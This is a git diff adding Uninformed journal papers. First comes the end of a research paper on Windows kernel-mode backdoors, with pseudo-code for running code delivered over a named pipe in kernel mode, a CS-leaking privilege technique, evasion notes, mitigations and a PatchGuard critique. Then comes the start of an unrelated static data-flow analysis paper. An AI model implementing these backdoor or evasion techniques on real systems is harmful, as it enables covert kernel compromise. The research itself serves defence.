user-mode part is simple; create a named pipe server using CreateNamedPipe +and then wait for a connection. The kernel-mode part is more interesting. +One basic idea might involve having a kernel-mode routine that builds an +asynchronous read IRP where the IRP's completion routine is defined as the +kernel-mode routine itself. In this way, when data arrives from the user-mode +process, the routine is notified and given an opportunity to execute the code +that was supplied. After the code has been executed, it can simply re-use the +code that was needed to pass the IRP to the underlying device associated with +the named pipe that it's interacting with. The following pseudo-code +illustrates how this could be accomplished: + +KernelRoutine(DeviceObject, ReadIrp, Context) +{ + // First time called, ReadIrp == NULL + if (ReadIrp == NULL) + { + FileObject = OpenNamedPipe(...) + } + // Otherwise, called during IRP completion + else + { + FileObject = GetFileObjectFromIrp(ReadIrp) + + RunCodeFromIrpBuffer(ReadIrp) + } + DeviceObject = IoGetRelatedDeviceObject(FileObject) + ReadIrp = IoBuildAsynchronousFsdRequest(...) + IoSetCompletionRoutine(ReadIrp, KernelRoutine) + IoCallDriver(DeviceObject, ReadIrp) +} + +Category: Type II + +Origin: The authors believe this to be the first public description of this +technique. + +Capabilities: Kernel-mode code execution. + +Covertness: The authors believe this technique to be fairly covert due to the +fact that the kernel-mode code profile is extremely minimal. The only code +that must be present at all times is the code needed to execute the read +buffer and then post the next read IRP to the target device object. There are +two main strategies that might be taken to detect this technique. The first +could include identifying malicious instances of the target device, such as a +malicious named pipe server. The second might involve attempting to perform +an in-memory fingerprint of the completion routine code, though this would be +far from fool proof, especially if the kernel-mode code is encoded until +invoked. + +2.7) Leaking CS + +With the introduction of protected mode into the x86 architecture, the concept +of separate privilege levels, or rings, was born. Lesser privileged rings +(such as ring 3) were designed to be restricted from accessing resources +associated with more privileged rings (such as ring 0). To support this +concept, segment descriptors are able to define access restrictions based on +which rings should be allowed to access a given region of memory. The +processor derives the Current Privilege Level (CPL) by looking at the low +order two bits of the CS segment selector when it is loaded. If all bits are +cleared, the processor is running at ring 0, the most privileged ring. If all +bits are set, then processor is running at ring 3, the least privileged ring. + +When certain events occur that require the operating system's kernel to take +control, such as an interrupt, the processor automatically transitions from +whatever ring it is currently executing at to ring 0 so that the request may +be serviced by the kernel. As part of this transition, the processor saves +the value of the a number of different registers, including the previous value +of CS, to the stack in order to make it possible to pick up execution where it +left off after the request has been serviced. The following structure +describes the order in which these registers are saved on the stack: + +typedef struct _SAVED_STATE +{ + ULONG_PTR Eip; + ULONG_PTR CodeSelector; + ULONG Eflags; + ULONG_PTR Esp; + ULONG_PTR StackSelector; +} SAVED_STATE, *PSAVED_STATE + +Potential security implications may arise if there is a condition where some +code can alter the saved execution state in such a way that the saved CS is +modified from a lesser privileged CS to a more privileged CS by clearing the +low order bits. When the saved execution state is used to restore the active +processor state, such as through an iret, the original caller immediately +obtains ring 0 privileges. + +Category: Undefined; this approach does not fit into any of the defined +categories as it simply takes advantage of hardware behavior relating around +how CS is used to determine the CPL of a processor. If code patching is used +to be able to modify the saved CS, then the implementation is Type I. + +Origin: Leaking CS to user-mode has been known to be dangerous since the +introduction of protected mode (and thus rings) into the x86 architecture with +the 80286 in 1982[22]. This approach therefore falls into the category of obvious +due to the documented hardware implications of leaking a kernel-mode CS when +transitioning back to user-mode. + +Capabilities: Kernel-mode code execution. + +Considerations: Leaking the kernel-mode CS to user-mode may have undesired +consequences. Whatever code is to be called in user-mode must take into +account that it will be running in a kernel-mode context. Furthermore, the +kernel attempts to be as rigorous as possible about checking to ensure that a +thread executing in user-mode is not allowed a kernel-mode CS. + +Covertness: Depending on the method used to intercept and alter the saved +execution state, this method has the potential to be fairly covert. If the +method involves secondary hooking in order to modify the state, then it may be +detected through some of the same techniques as described in the section on +image patching. + +3) Prevention & Mitigation + +The primary purpose of this paper is not to explicitly identify approaches +that could be taken to prevent or mitigate the different types of attacks +described herein. However, it is worth taking some time to describe the +virtues of certain approaches that could be extremely beneficial if one were +to attempt to do so. The subject of preventing backdoors from being installed +and persisted is discussed in more detail in section and therefore won't be +considered in this section. + +One of the more interesting ideas that could be applied to prevent a number of +different types of backdoors would be immutable memory. Memory is immutable +when it is not allowed to be modified. There are a few key regions of memory +used by the Windows kernel that would benefit greatly from immutable memory, +such as executable code segments and regions that are effectively write-once, +such as the SSDT. While immutable memory way work in principle, there is +currently no x86 or x64 hardware (that the authors are aware of) that permits +this level of control. + +Even though there appears to be no hardware support for this, it is still +possible to implement immutable memory in a virtualized environment. This is +especially true in hardware-assisted virtualization implementations that make +use of a hypervisor in some form. In this model, a hypervisor can easily +expose a hypercall (similar to a system call, but traps into the hypervisor) +that would allow an enlightened guest to mark a set of pages as being +immutable. From that point forward, the hypervisor would restrict all writes +to the pages associated with the immutable region. + +As mentioned previously, particularly good candidates for immutable memory are +things like the SSDT, Window's ALMOSTRO write-once segment, as well as other +single-modification data elements that exist within the kernel. Enforcing +immutable memory on these regions would effectively prevent backdoors from +being able to establish certain types of hooks. The downside to it would be +that the kernel would lose the ability to hot-patch itself There are some +instances where kernel-mode hot-patching is currently require, especially on +x64. Still, the security upside would seem to out-weigh the potential +downside. On x64, the use of immutable memory would improve the resilience of +PatchGuard by allowing it to actively prevent hot-patching rather than relying +on detecting it with the use of a polling cycle. + +4) Running Code in Kernel-Mode + +There are many who might argue that it's not even necessary to write code that +prevents or detects specific types of kernel-mode backdoors. This argument +can be made on the grounds of two very specific points. The first point is +that in order for one to backdoor the kernel, one must have some way of +executing code in kernel-mode. Based on this line of reasoning, one might +argue that the focus should instead be given to preventing untrusted code from +running in kernel-mode. The second point in this argument is that in order +for one to truly compromise the host, some form of data must be persisted. If +this is assumed to be the case, then an obvious solution would be to +identify ways of preventing or detecting the persistent data. While there +may also be additional points, these two represent the common themes +observed by the authors. Unfortunately, the fact is that both of these +points are, at the time of this writing, flawed. + +It is currently not possible with present day operating systems and x86/x64 +hardware to guarantee that only specific code will run in the context of an +operating system's kernel. Though Microsoft wishes it were possible, which is +clearly illustrated by their efforts in Code Integrity and Trusted Boot, there +is no real way to guarantee that kernel-mode code cannot be exploited in a +manner that might lead to code execution[2]. There have been no shortage of +Windows kernel-mode vulnerabilities to illustrate the feasibility of this type +of vector[6, 10]. This matter is also not helped by the fact that the Windows kernel +currently has very few exploit mitigations. This makes the exploitation of +kernel vulnerabilities trivial in comparison to some of the mitigations found +in user-mode on Windows XP SP2 and, more recently, Windows Vista. + +In addition to the exploitation vector, it is also important to consider +alternative ways of executing code in kernel-mode that would be largely +invisible to the kernel itself. John Heasman has provided some excellent +research into the subject of using the BIOS, expansion ROMs, and the +Extensible Firmware Interface (EFI) as a means of running arbitrary code in +the context of the kernel without necessarily relying on any hooks directly +visible to the kernel itself[16, 17]. Loïc Duflot described how to use the System +Management Mode (SMM) of Intel processors as a method of subverting the +operating system to bypass BSD's securelevel restrictions[9]. There has also +been a lot discussion around using DMA to directly interact with and modify +physical memory without involving the operating system. However, this form of +attack is of less concern due to the fact that physical access is required. + +The idea of detecting or preventing a rootkit from persisting data is +something that is worthy of thoughtful consideration. Indeed, it's true that +in order for malware to survive across reboots, it must persist itself in some +form or another. By preventing or detecting this persisted data, it would be +possible to effectively prevent any form of sustained infection. On the +surface, this idea is seemingly both simple and elegant, but the devil is in +the details. The fact that this idea is fundamentally flawed can be plainly +illustrated using the current state of Anti-Virus technology. + +For the sake of argument, assume for the moment that there really is a way to +deterministically prevent malware from persisting itself in any form. Now, +consider a scenario where a web server at financial institution is compromised +and a memory resident rootkit is used. The point here should be obvious: no +data associated with the rootkit touches the physical hardware. In this +example, one might rightly think that the web server will not be rebooted for +an extended period of time. In these circumstances, there is really no +difference between a persistent and non-persistent rootkit. Indeed, a memory +resident rootkit may not be ideal in certain situations, but it's important to +understand the implications. + +Based on the current state-of-the-art, it is not possible to deterministically +prevent malware from persisting itself. There are far too many methods of +persisting data. This is further illustrated by John Heasman in his ACPI and +expansion ROM work. To the authors' knowledge, modern tools focus their +forensic analysis on the operating system and on file systems. This isn't +sufficient, however, as rootkit data can be stored in locations that are +largely invisible to the operating system. While this may be true, there has +been a significant push in recent years to provide the hardware necessary to +implement a trusted system boot. This initiative is being driven by the +Trusted Computing Group with involvement from companies such as Microsoft and +Intel[42]. One of the major outcomes of this group has been the Trusted Platform +Module (TPM) which strives to facilitate a trusted system boot, among other +things[43]. At the time of this writing, the effectiveness of TPM is largely +unknown, but it is expected that it will be a powerful and useful security +feature as it matures. + +The fact that there is really no way of preventing untrusted code from running +in kernel-mode in combination with the fact that there is really no way to +universally prevent untrusted code from persisting itself helps to illustrate +the need for thoughtful consideration of ways to both prevent and detect +kernel-mode backdoors. + +5) PatchGuard versus Rootkits + +There has been some confusion centering around whether or not PatchGuard can +be viewed as a deterrent to rootkits. On the surface, it would appear that +PatchGuard does indeed represent a formidable opponent to rootkit developers +given the fact that it checks for many different types of hooks. Beneath the +surface, it's clear that PatchGuard is fundamentally flawed with respect to +its use as a rootkit deterrent. This flaw centers around the fact that +PatchGuard, in its current implementation, runs at the same privilege level as +other driver code. This opens PatchGuard up to attacks that are designed to +prevent it from completing its checks. The authors have previously outlined +many different approaches that can be used to disable PatchGuard[36, 37]. It is +certainly possible that Microsoft could implement fixes for these attacks, and +indeed they have implemented some in more recent versions, but the problem +remains a cat-and-mouse game. In this particular cat-and-mouse game, rootkit +authors will always have an advantage both in terms of time and in terms of +vantage point. + +In the future, PatchGuard can be improved to leverage features of a hypervisor +in a virtualized environment that might allow it to be protected from +malicious code running in the context of a guest. For example, the current +version of PatchGuard currently makes extensive use of obfuscation in order to +presumably prevent malware from finding its code and context structures in +memory. The presence of a hypervisor may permit PatchGuard to make more +extensive use of immutable memory, or to alternatively run at a privilege +level that is greater than that of an executing guest, such as within the +hypervisor itself (though this could have severe security implications if done +improperly). + +Even if PatchGuard is improved to the point where it's no longer possible to +disable its security checks, there will still be another fundamental flaw. +This second flaw centers around the fact that PatchGuard, like any other code +designed to perform explicit checks, is like a horse with blinders on. It's +only able to detect modifications to the specific structures that it knows +about. While it may be true that these structures are the most likely +candidates to be hooked, it is nevertheless true that many other structures +exist that would make suitable candidates, such as the SuspendApc of a +specific thread. These alternative candidates are meant to illustrate the +challenges PatchGuard faces with regard to continually evolving its checks to +keep up with rootkit authors. In this manner, PatchGuard will continue to be +forced into a reactive mode rather than a proactive mode. If IDS products +have illustrated one thing it's that reactive security solutions are largely +inadequate in the face of a skilled attacker. + +PatchGuard is most likely best regarded as a hall monitor. Its job is to make +sure students are doing things according to the rules. Good students, such as +ISVs, will inherently bend to the will of PatchGuard lest they find themselves +in unsupported waters. Bad students, such as rootkits, fear not the wrath of +PatchGuard and will have few qualms about sidestepping it, even if the +technique used to sidestep may not work in the future. + +6) Acknowledgements + +The authors would like to acknowledge all of the people, named or unnamed, +whose prior research contributed to the content included in this paper. + +7) Conclusion + +At this point it should be clear that there is no shortage of techniques that +can be used to expose a local kernel-mode backdoor on Windows. These +techniques provide a subtle way of weakening the security guarantees of the +Windows kernel by exposing restricted resources to user-mode processes. These +resources might include access to kernel-mode data, disabling of security +checks, or the execution of arbitrary code in kernel-mode. There are many +different reasons why these types of backdoors would be useful in the context +of a rootkit. + +The most obvious reason these techniques are useful in rootkits is for the +very reason that they provide access to restricted resource. A less obvious +reason for their usefulness is that they can be used as a method of reducing a +rootkit's kernel-mode code profile. Since many tools are designed to scan +kernel-mode memory for the presence of backdoors[32, 14], any reduction of a +rootkit's kernel-mode code profile can be useful. Rather than placing code in +kernel-mode, techniques have been described for redirecting code execution to +code stored in user-mode in a process-specific fashion. This is accomplished +by redirecting code into a portion of the ntdll mapping which exists in every +process, including the System process. + +Understanding how different backdoor techniques work is necessary in order to +consider approaches that might be taken to prevent or detect rootkits that +employ them. For example, the presence of immutable memory may eliminate some +of the common techniques used by many different types of rootkits. Likewise, +when these techniques are eliminated, new ones will be developed, continuing +the cycle that permeates most adversarial systems. + +References + +[1] AMD. AMD64 Architecture Programmer's Manual Volume 2: System Programming. Dec, 2005. + +[2] Anonymous Hacker. Xbox 360 Hypervisor Privilege Escalation Vulnerability. Bugtraq. Feb, 2007. http://www.securityfocus.com/archive/1/461489 + +[3] Blanset, David et al. Dual operating system computer. + Oct, 1985. http://www.freepatentsonline.com/4747040.html + +[4] Brown, Ralf. Pentium Model-Specific Registers and What They Reveal. + Oct, 1995. http://www.rcollins.org/articles/p5msr/PentiumMSRs.html + +[5] Butler, James and Sherri Sparks. Windows Rootkits of 2005. + Nov, 2005. http://www.securityfocus.com/infocus/1850 + +[6] Cerrudo, Cesar. Microsoft Windows Kernel GDI Local Privilege Escalation. + Oct, 2004. http://projects.info-pull.com/mokb/MOKB-06-11-2006.html + +[7] CIAC. E-34: Onehalf Virus (MS-DOS). + Sep, 1994. http://www.ciac.org/ciac/bulletins/e-34.shtml + +[8] Conover, Matt. Malware Profiling and Rootkit Detection on Windows. + 2005. http://xcon.xfocus.org/xcon2005/archives/2005/Xcon2005_Shok.pdf + +[9] Duflot, Loïc. Security Issues Related to Pentium System Management Mode. + CanSecWest, 2006. http://www.cansecwest.com/slides06/csw06-duflot.ppt + +[10] Ellch, John et al. Exploiting 802.11 Wireless Driver Vulnerabilities on Windows. + Jan, 2007. http://www.uninformed.org/?v=6&a=2&t=sumry + +[11] Firew0rker, the nobodies. Kernel-mode backdoors for Windows NT. + Phrack 62. Jan, 2005. http://www.phrack.org/issues.html?issue=62&id=6#article + +[12] fuzenop. SysEnterHook. + Feb, 2005. http://www.rootkit.com/vault/fuzen_op/SysEnterHook.zip + +[13] Garfinkel, Tal. Traps and Pitfalls: Practical Problems in System Call Interposition Based Security Tools. + http://www.stanford.edu/ talg/papers/traps/traps-ndss03.pdf + +[14] Gassoway, Paul. Discovery of kernel rootkits with memory scan. + Oct, 2005. http://www.freepatentsonline.com/20070078915.html + +[15] Gulbrandsen, John. System Call Optimization with the SYSENTER Instruction. + Oct, 2004. http://www.codeguru.com/Cpp/W-P/system/devicedriverdevelopment/article.php/c8223/ + +[16] Heasman, John. Implementing and Detecting an ACPI BIOS Rootkit. + BlackHat Federal, 2006. https://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Heasman.pdf + +[17] Heasman, John. Implementing and Detecting a PCI Rootkit. + Nov, 2006. http://www.ngssoftware.com/research/papers/Implementing_And_Detecting_A_PCI_Rootkit.pdf + +[18] Hoglund, Greg. Kernel Object Hooking Rootkits (KOH Rootkits). + Jun, 2006. http://www.rootkit.com/newsread.php?newsid=501 + +[19] Hoglund, Greg. A *REAL* NT Rootkit, patching the NT Kernel. + Phrack 55. Sep, 1999. http://phrack.org/issues.html?issue=55&id=5 + +[20] Hoglund, Greg and James Butler. Rootkits: Subverting the Windows Kernel. 2006. Addison-Wesley. + +[21] Hunt, Galen and Doug Brubacher. Detours: Binary Interception of Win32 Functions. Proceedings of the 3rd USENIX Windows NT Symposium, pp. 135-143. Seattle, WA, July 1999. USENIX. + +[22] Intel. 2.1.2 The Intel 286 Processor (1982). + Intel 64 and IA-32 Architectures Software Developer's Manual. Denver, Colorado: Intel, 34. http://www.intel.com/products/processor/manuals/index.htm. + + +[23] Intel. IA-32 Intel Architecture Software Developer's Manual Volume 3: System Programming Guide. + Sep, 2005. + +[24] Jack, Barnaby. Remote Windows Kernel Exploitation: Step into the Ring 0. Aug, 2005. http://www.blackhat.com/presentations/bh-usa-05/BH_US_05-Jack_White_Paper.pdf + +[25] Kasslin, Kimmo. Kernel Malware: The Attack from Within. + 2006. http://www.f-secure.com/weblog/archives/kasslin_AVAR2006_KernelMalware_paper.pdf + +[26] Kdm. NTIllusion: A portable Win32 userland rootkit [incomplete]. + Phrack 62. Jan, 2005. http://www.phrack.org/issues.html?issue=62&id=12&mode=txt + +[27] M. B. Jones. Interposition agents: Transparently interposing user code at the system interface. + In Symposium on Operating System Principles, pages 80-93, 1993. http://www.scs.stanford.edu/nyu/04fa/sched/readings/interposition-agents.pdf + +[28] Mythrandir. Protected mode programming and O/S development. + Phrack 52. Jan, 1998. http://www.phrack.org/issues.html?issue=52&id=17#article + +[29] PaX team. PAGEEXEC. + Mar, 2003. http://pax.grsecurity.net/docs/pageexec.txt + +[30] Plaguez. Weakening the Linux Kernel. + Phrack 52. Jan, 1998. http://www.phrack.org/issues.html?issue=52&id=18#article + +[31] Prasad Dabak, Milind Borate, and Sandeep Phadke. Hooking Software Interrupts. + Oct, 1999. http://www.windowsitlibrary.com/Content/356/09/1.html + +[32] Rutkowska, Joanna. System Virginity Verifier. + http://invisiblethings.org/tools/svv/svv-2.3-src.zip + +[33] Rutkowska, Joanna. Rookit Hunting vs. Compromise Detection. + BlackHat Europe, 2006. http://invisiblethings.org/papers/rutkowska_bheurope2006.ppt + +[34] Rutkowska, Joanna. Introducing Stealth Malware Taxonomy. + Nov, 2006. http://invisiblethings.org/papers/malware-taxonomy.pdf + +[35] Silvio. Shared Library Call Redirection Via ELF PLT Infection. + Phrack 56. Jan, 2000. http://www.phrack.org/issues.html?issue=56&id=7#article + +[36] skape and Skywing. Bypassing PatchGuard on Windows x64. + Uninformed Journal. Jan, 2006. http://www.uninformed.org/?v=3&a=3&t=sumry + +[37] Skywing. Subverting PatchGuard version 2. + Uninformed Journal. Jan, 2007. http://www.uninformed.org/?v=6&a=1&t=sumry + +[38] Skywing. Anti-Virus Software Gone Wrong. + Uninformed Journal. Jun, 2006. http://www.uninformed.org/?v=4&a=4&t=sumry + +[39] Skywing. Programming against the x64 exception handling support. + Feb, 2007. http://www.nynaeve.net/?p=113 + +[40] Soeder, Derek. Windows Expand-down Data Segment Local Privilege Escalation. + Apr, 2004. http://research.eeye.com/html/advisories/published/AD20040413D.html + +[41] Sparks, Sherri and James Butler. Raising the Bar for Windows Rootkit Detection. + Phrack 63. Jan, 2005. http://www.phrack.org/issues.html?issue=63&id=8 + +[42] Trusted Computing Group. Trusted Computing Group: Home. + https://www.trustedcomputinggroup.org/home + +[43] Trusted Computing Group. TPM Specification. + https://www.trustedcomputinggroup.org/specs/TPM/ + +[44] Welinder, Morten. modifyldt security holes. + Mar, 1996. http://lkml.org/lkml/1996/3/6/13 + +[45] Wikipedia. Call gate. + http://en.wikipedia.org/wiki/Call_gate diff --git a/uninformed/8.6.txt b/uninformed/8.6.txt new file mode 100644 index 0000000..0c4816f --- /dev/null +++ b/uninformed/8.6.txt @@ -0,0 +1,1234 @@ +Generalizing Data Flow Information +Aug, 2007 +skape +mmiller@hick.org + +Abstract: Generalizing information is a common method of reducing the quantity +of data that must be considered during analysis. This fact has been plainly +illustrated in relation to static data flow analysis where previous research +has described algorithms that can be used to generalize data flow information. +These generalizations have helped support more optimal data flow analysis in +certain situations. In the same vein, this paper describes a process that can +be employed to generalize and persist data flow information along multiple +generalization tiers. Each generalization tier is meant to describe the data +flow behaviors of a conceptual software element such as an instruction, a +basic block, a procedure, a data type, and so on. This process makes use of +algorithms described in previous literature to support the generalization of +data flow information. To illustrate the usefulness of the generalization +process, this paper also presents an algorithm that can be used to determine +reachability at each generalization tier. The algorithm determines +reachability starting from the least specific generalization tier and uses the +set of reachable paths found to progressively qualify data flow information +for each successive generalization tier. This helps to constrain the amount +of data flow information that must be considered to a minimal subset. + +1) Introduction + +Data flow analysis uses data flow information to solve a particular data flow +problem such as determining reachability, dependence, and so on. The +algorithms used to obtain data flow information may vary in terms of accuracy +and precision. To help quantify effectiveness, data flow algorithms may +generally be categorized based on specific sensitivities. The first category, +referred to ask flow sensitivity is used to convey whether or not an algorithm +takes into account the implied order of instructions. Path sensitivity is +used to convey whether or not an algorithm considers predicates. Finally, +algorithms may also be context-sensitive if they take into account a calling +context to restrict analysis to realizable paths when considering +interprocedural data flow information. + +Data flow information is typically collected by statically analyzing the data +dependence of instructions or statements. For example, conventional def-use +chains describe the variables that exist within def(), use(), in(), out(), and +kill() set for each instruction or statement. Understanding data flow +information with this level of detail makes it possible to statically solve a +particular data flow problem. However, the resources needed to represent the +def-use data flow information can be prohibitive when working with large +applications. Depending on the data flow problem, the amount of data flow +information required to come to a solution may be in excess of the physical +resources present on a computer performing the analysis. This physical +resource problem can be solved using at least two general approaches. + +The most basic approach might involve simply partitioning, or fragmenting, +analysis information such that smaller subsets are considered individually +rather than attempting to represent the complete set of data flow information +at once[15]. While this would effectively constrain the amount of physical +resources required, it would also directly impact the accuracy and precision +of the underlying algorithm used to perform data flow analysis. For instance, +identifying the ``interesting portion'' of a program may require more state +than can be feasibly obtained in single program fragment. A second and +potentially more optimal approach might involve generalizing data flow +information. By generalizing data flow information, an algorithm can operate +within the bounds of physical resources by making use of a more abstract view +of the complete set of data flow information. The distinction between the +generalizing approach and the partitioning approach is that the generalized +data flow information should not affect the accuracy of the algorithm since it +should still be able to represent the complete set of generalized data flow +information at once. + +There has been significant prior work that has illustrated the effectiveness +of generalizing data flow information when performing data flow analysis. The +def-use information obtained between instructions or statements has been +generalized to describe sets for basic blocks. Horwitz, Reps, and Binkley +describe how a system dependence graph (SDG) can be derived from +intraprocedural data flow information to produce a summary graph which convey +context-sensitive data flow information at the procedure level[7]. Their paper +went on to describe an interprocedural slicing algorithm that made use of +SDGs. Reps, Horwitz, and Sagiv later described a general framework (IFDS) in +which many data flow analysis problems can be solved as graph reachability +problems[13, 14]. The algorithms proposed in their paper focus on restricting +analysis to interprocedurally realizable paths to improve precision. +Identifying interprocedurally realizable paths has since been compared to the +concept of context-free-language (CFL) reachability (CFL-reachability)[8]. These +algorithms have helped to form the basis for techniques used in this paper to +both generalize and analyze data flow information. + +This paper approaches the generalization of data flow information by defining +generalization tiers at which data flow information can be conveyed. A +generalization tier is intended to show the data flow relationships between a +set of conceptual software elements. Examples of software elements include an +instruction, a basic block, a procedure, a data type, and so on. To define +these relationships, data flow information is collected at the most specific +generalization tier, such as the instruction tier, and then generalized to +increasingly less-specific generalization tiers, such as the basic block, +procedure, and data type tiers. + +To illustrate the usefulness of generalizing data flow information, this paper +also presents a progressive algorithm that can be used to determine +reachability between nodes on a data flow graph at each generalization tier. +The algorithm starts by generating a data flow graph using data flow +information from the least-specific generalization tier. The graph is then +analyzed using a previously describe algorithm to determine reachability +between an arbitrary set of nodes. The set of reachable paths found is then +used to qualify the set of more-specific potentially reachable paths found at +the next generalization tier. The more-specific paths are used to construct a +new data flow graph. These steps then repeat using each more-specific +generalization tier until it is not possible to obtained more detailed +information. The benefit of this approach is that a minimal set of data flow +information is considered as a result of progressively qualifying data flow +paths at each generalization tier. It should be noted that different +reachability problems may require state that is prohibitively large. As such, +it is helpful to consider refining a reachability problem to operate more +efficiently by making use of generalized information. + +This paper is organized into two sections. Section 2 discusses the algorithms +used to generalize data flow information at each generalization tier. Section +3 describes the algorithm used to determine reachable data flow paths by +progressively analyzing data flow information at each generalization tier. It +should be noted in advance that the author does not claim to be an expert in +this field; rather, this paper is simply an explanation of the author's +current thoughts. These thoughts attempt to take into account previous work +whenever possible to the extent known by the author. Given that this is the +case, the author is more than willing to receive criticism relating to the the +ideas put forth in this paper. + +2) Generalization + +Generalizing data flow information can make it possible to analyze large data +sets without losing accuracy. This section describes the process of +generalizing information at each generalization tier. As a matter of course, +each generalization tier uses data flow information obtained from its +preceding more specific generalization tier. In this way, the basic block +tier generalizes information obtained at the instruction tier, the procedure +tier generalizes information obtained at the basic block tier, and so on. The +algorithms used to generalize information at each generalization tier can have +a direct impact on the accuracy of the information that can be obtained when +used during data flow analysis. The subject of accuracy will be addressed for +each specific tier. + +To obtain generalized data flow information, a set of target executable image +files, or modules, must be defined. The target modules serve to define the +context from which data flow information will be obtained and generalized. +The general process used to accomplish this involves visiting each procedure +within each module. For each procedure, data flow information is collected at +the instruction tier and is then generalized to each less-specific tier. To +facilitate the reachability algorithm, it is assumed that as the data flow +information is collected, it is persisted in a form such that can be accessed +on demand. The process described in this paper assumes a normalized database +is used to contain the data flow information found at each generalization +tier. In this manner, the upper limit associated with the number of target +modules is tied to the amount of available persistent storage with respect to +the amount required by a given data flow problem. + +Before proceeding, it is important to point out that while this paper +describes explicit algorithms for generalizing at each tier, it is entirely +possible to substitute alternative algorithms. This serves to illustrate that +the concept of generalizing information along generalization tiers is +sufficiently abstract enough to support representing alternate forms of data +flow and control flow information. By using different algorithms, it is +possible to convey different forms of data flow relationships which vary in +terms of precision and accuracy. + +2.1) Instruction Tier + +Generalizing data flow information presupposes that there is data flow +information to generalize. As such, a base set of data flow information must +be collected first. For the purposes of this paper, the most specific data +flow information is collected at the instruction tier using the Static Single +Assignment (SSA) implementation provided by Microsoft's Phoenix framework, +though other algorithms could just as well be used[11]. SSA is an elegant +solution to the problem of representing data flow information in a +flow-sensitive manner. Each definition and use of a given variable are +defined in terms of a unique variable version which makes it possible to show +clear, unambiguous data flow relationships. In cases where data flow +information may merge along control flow paths, SSA makes use of a phi +function which acts as a pseudo-instruction to represent the merge point. +Obtaining distinct data flow paths at the instruction tier can be accomplished +by traversing an SSA graph for a given procedure starting from each root +variable, which have no prior definitions, and proceeding to each reachable +leaf variable, which have no subsequent uses, are encountered along each data +flow path. The end result of this traversal is the complete set of data flow +paths found within the context of a given procedure. + +One of SSA's limitations is that it is only designed to work intraprocedurally +and therefore makes no effort to describe the behavior of passing data between +procedures, such as through input and output parameters. In order to provide +an accurate, distinct path data flow representation, one must take into +account interprocedural data flow. One method of accomplishing this is to +generalize the concept of SSA's phi function and use it represent formal +parameters. In this way, the phi function can be used to represent data flow +merges that happen as a result of data passing as input or output parameters +when a procedure is called. A phi function can be created to represent each +formal input and output parameter for a procedure, thus linking definitions of +parameters at a call site to actual parameter uses in a callee. Reps, +Horwitz, and Sagiv describe a concept similar to this[13]. + +In addition to using phi functions to link the definitions and uses of formal +parameters, it is also necessary to fracture data flow paths at call sites +that are found within a procedure . This is necessary because data flow paths +collected using SSA information will convey a relationship between the input +parameters passed to a procedure and the output parameters returned by a +procedure. This is the case because a call instruction at a call site appears +to use input parameters and define output parameters, thus creating an +implicit link between input and output parameters. Since SSA information is +obtained intraprocedurally, it is not possible to know in advance whether or +not an input parameter will influence an output parameter. + +To fracture a data flow path, the instructions that define input parameters +passed at a given call site are instead linked directly to the associated +formal input parameter phi functions that are found in the context of the +target procedure. Likewise, instructions that use output parameters +previously defined by the call instruction are instead linked directly to the +associated formal output parameter phi functions found in the context of the +target procedure. This has the effect of breaking the original data flow path +into two disconnected data flow paths at the call site location. The linking +of actual parameters and call site parameters with formal parameters has been +illustrated in previous literature. Horwitz, Reps, and Binkley used this +concept during the construction of a system dependence graph (SDG)[7]. The +concept of creating symbolic variables that are later used to link information +together is not new[14]. Figure 2 provides an example of what a conventional and +fractured data flow path might look like. + + Conventional Fractured + + .---------. .---------. + | ldarg.0 | | ldarg.0 | + `---------` `---------` + | | + V V + .---------. .---------. + | call g | | fin(x) | + `---------` `---------` + | + | ------------------ + V + .---------. .---------. + | stloc.0 | | fout(g) | + `---------` `---------` + | + V + .---------. + | stloc.0 | + `---------` + + Figure 2 + Fracturing a data flow path at a call + site. Call instructions no longer act + as the producers or receivers of data + that is passed between procedures. + +Using the fracturing concept, the instruction tier's path-sensitive data flow +information for a given procedure becomes disconnected. This helps to improve +the overall accuracy of the data flow paths that are conveyed. Fracturing +also has the added advantage of making it possible to use formal parameter phi +functions to dynamically link a caller and a callee at runtime. This makes it +possible to identify context-sensitive interprocedural data flow paths at the +granularity of an instruction. This ability will be described in more detail +when the reachability algorithm is described in section 3. + +With an understanding of the benefits of fracturing, it is now possible to +define the general form that data flow paths may take at the instruction tier. +This general form is meant to describe the structure of data flow paths at the +instruction tier in terms of the potential set of origins, transient, and +terminal points with respect to the general instruction types. Based on the +description given above, it is possible to categorize instructions into a few +general types. Using these general instruction types, the general form of +instruction data flow paths can be captured as illustrated by the diagram in +figure 3. + +value: Defines or uses a data value +compare: Compares a data value +fin: Pseudo instruction representing a formal input parameter +fout: Pseudo instruction representing a formal output parameter + + + .---------. .---------. .---------. + | value | | fin | | fout | + `---------` `---------` `---------` + \ | / + `---------|-----------` + V + .--------------. + | value | + | compare | + | ... | + `--------------` + | + .------------|---------.-------------. + V V V V + .---------. .---------. .---------. .---------. + | value | | fin | | fout | | compare | + `---------` `---------` `---------` `---------` + + Figure 3 + General forms of data flow paths at the instruction tier + +Based on this general description of instruction data flow paths, it is +helpful to consider a concrete example. Consider the example source code +described below which shows the implementation of the f function. + +static public int f(int x) +{ + return (x >= 0) ? g(x) : x + 1; +} + +This function is intentionally very simple so as to limit the number of data +flow paths that must be represented visually. Using the concepts described +above, the instruction data flow paths that would be created as a result of +analyzing this procedure are shown in figure 4. Note that the call site for +the g function results in two disconnected data flow paths. The end result is +that there are four unique data flow paths within this procedure. + + + .----------. + | fin(f,x) | + `----------` + / / | + / / | + V | V + .----------. | .----------. .----------. + | ldarg.0 | | | ldarg.0 | | ldc | + `----------` | `----------` `----------` + | | | / + | | | / + | | V V +.------. | | .----------. .----------. +| ldc | | | | add | | fout(g) | +`------` | | `----------` `----------` + \ | | \ \ / + \ | | \ \ / + V V V V V V + .-------. .----------. .--------. + | brcmp | | ldarg.0 | | ret | + `-------` `----------` `--------` + | | + | | + V V + .----------. .---------. + | fin(g,x) | | fout(f) | + `----------` `---------` + + Figure 4 + Instruction tier data flow paths for the example code. + The context of these data flow paths is the f function. + +2.2) Basic Block Tier + +Once the complete set of data flow paths are identified at the instruction +tier for a given procedure, the next step is to generalize data flow +information to the basic block tier. At the basic block tier, instruction +data flow paths should be generalized to show path-sensitive data flow +interactions between basic blocks rather than instructions. This level of +generalization reduces the amount of information needed to represent data flow +paths. For example, there are many cases where data will be passed between +multiple instructions within the same basic block. Using basic block tier +generalization, those individual operations can be generalized and represented +as a single basic block. The generalized basic block data flow paths can then +be persisted for subsequent use when determining reachability in much the same +fashion that was used at the instruction tier. + +Since the instruction tier's data flow information has been fractured and +parameters passed at call sites have been tied to phi functions, an approach +must be defined to preserve this information at the basic block tier during +generalization. An easy way of preserving 